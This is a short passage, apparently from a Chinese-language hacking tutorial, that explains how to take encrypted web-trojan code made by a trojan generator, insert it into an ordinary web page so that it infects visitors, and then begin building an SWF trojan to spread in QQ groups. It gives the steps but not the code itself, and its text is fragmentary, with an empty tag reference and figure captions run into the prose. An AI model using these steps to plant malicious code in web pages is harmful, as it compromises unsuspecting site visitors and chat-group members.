用记事本打开刚才生成的“script.txt”文件，可以看到木马代码，代码是经过加密的，一般人很难看出这是网页木马代码来(如图2)。

复制所有代码，然后将代码插入到任意一个正常的网页中，就可以得到一个网页木马了。

小提示:将木马代码插入正常的网页中，其位置一般是位于“”标记中间。

图1 用木马生成器生成木马代码图2 加密的木马代码步骤二：制作SWF木马在以前的QQ群中，本来只需要发一张带图片的帖子就可以实现挂马的目的。